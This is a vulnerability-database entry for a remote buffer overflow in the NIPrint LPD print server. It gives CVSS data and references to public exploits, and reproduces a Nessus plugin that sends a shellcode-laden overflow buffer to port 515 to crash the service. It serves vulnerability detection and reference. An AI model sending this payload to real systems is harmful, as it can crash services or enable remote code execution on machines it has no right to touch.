Vulnerabilities > CVE-2003-1141 - Remote Buffer Overrun vulnerability in Network Instruments Niprint Lpd-Lpr Print Server 4.10

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
network-instruments
nessus
exploit available
metasploit
NVD
Published: 2003-11-04
Updated: 2017-07-11

Summary

Buffer overflow in NIPrint 4.10 allows remote attackers to execute arbitrary code via a long string to TCP port 515.

Vulnerable Configurations

Part Description Count
Hardware
Network_Instruments
1

Exploit-Db

descriptionNIPrint LPD Request Overflow. CVE-2003-1141. Remote exploit for windows platform
idEDB-ID:16336
last seen2016-02-01
modified2010-12-25
published2010-12-25
reportermetasploit
sourcehttps://www.exploit-db.com/download/16336/
titleNIPrint LPD Request Overflow

Metasploit

descriptionThis module exploits a stack buffer overflow in the Network Instrument NIPrint LPD service. Inspired by Immunity's VisualSploit :-)
idMSF:EXPLOIT/WINDOWS/LPD/NIPRINT
last seen2019-11-19
modified2017-07-24
published2006-09-12
references
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/lpd/niprint.rb
titleNIPrint LPD Request Overflow

Nessus

NASL familyDenial of Service
NASL idNIPRINT_DOS.NASL
descriptionA vulnerability in the NIPrint could allow an attacker to remotely overflow an internal buffer which could allow code execution.
last seen2020-06-01
modified2020-06-02
plugin id11926
published2003-11-17
reporterThis script is Copyright (C) 2003-2011 Matt North
sourcehttps://www.tenable.com/plugins/nessus/11926
titleNIPrint LPD-LPR Print Server String Handling Remote Overflow
code
#

include("compat.inc");

if(description) 
{ 
	script_id(11926); 
	script_version("1.17");
	script_cve_id("CVE-2003-1141");
	script_bugtraq_id(8968);
        
	script_name(english:"NIPrint LPD-LPR Print Server String Handling Remote Overflow");

 script_set_attribute(attribute:"synopsis", value:
"Arbitrary code may be run on the remote host." );
 script_set_attribute(attribute:"description", value:
"A vulnerability in the NIPrint could allow an attacker to remotely 
overflow an internal buffer which could allow code execution." );
 script_set_attribute(attribute:"solution", value:
"None, Contact the vendor:
 http://www.networkinstruments.com/products/niprint.html" );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"metasploit_name", value:'NIPrint LPD Request Overflow');
 script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
 script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
 script_set_attribute(attribute:"canvas_package", value:'CANVAS');

 script_set_attribute(attribute:"plugin_publication_date", value: "2003/11/17");
 script_set_attribute(attribute:"vuln_publication_date", value: "2003/11/05");
 script_cvs_date("Date: 2018/07/16 14:09:13");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

        script_summary(english:"Checks for vulnerable NIPrint");
	script_category(ACT_DENIAL);
	script_copyright(english:"This script is Copyright (C) 2003-2011 Matt North");
	script_family(english:"Denial of Service");

	exit(0);
}

include("global_settings.inc");
include("misc_func.inc");

port = 515;
if (! get_port_state(port)) exit(0);

r = raw_string( 0x90,0xCC,0x90,0x90,0x90,0x90,0x8B,0xEC,0x55,0x8B,0xEC,0x33,0xFF,0x57,0x83,0xEC,0x04,0xC6,0x45,0xF8,0x63
,0xC6, 0x45, 0xF9, 0x6D,0xC6,0x45,0xFA,0x64,0xC6,0x45,0xFB,0x2E,0xC6,0x45,0xFC,0x65,0xC6,0x45,0xFD,0x78,
0xC6,0x45,0xFE,0x65,0xB8,0xC3,0xAF,0x01,0x78,0x50,0x8D,0x45,0xF8,0x50,0xFF,0x55,0xF4,0x5F);

r1 = raw_string( 0xCC, 0x83,0xC4,0x04, 0xFF,0xE4);
r2 = string(crap(43));
r3 = raw_string( 0xcb, 0x50, 0xf9, 0x77);
bo = r + r1 + r2 + r3;

soc = open_priv_sock_tcp(dport: port);
if (!soc) exit(1);

send(socket:soc,data:bo);

close(soc);

if (service_is_dead(port: port) > 0)
  security_hole(port);

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/83160/niprint.rb.txt
idPACKETSTORM:83160
last seen2016-12-05
published2009-11-26
reporterH D Moore
sourcehttps://packetstormsecurity.com/files/83160/NIPrint-LPD-Request-Overflow.html
titleNIPrint LPD Request Overflow

References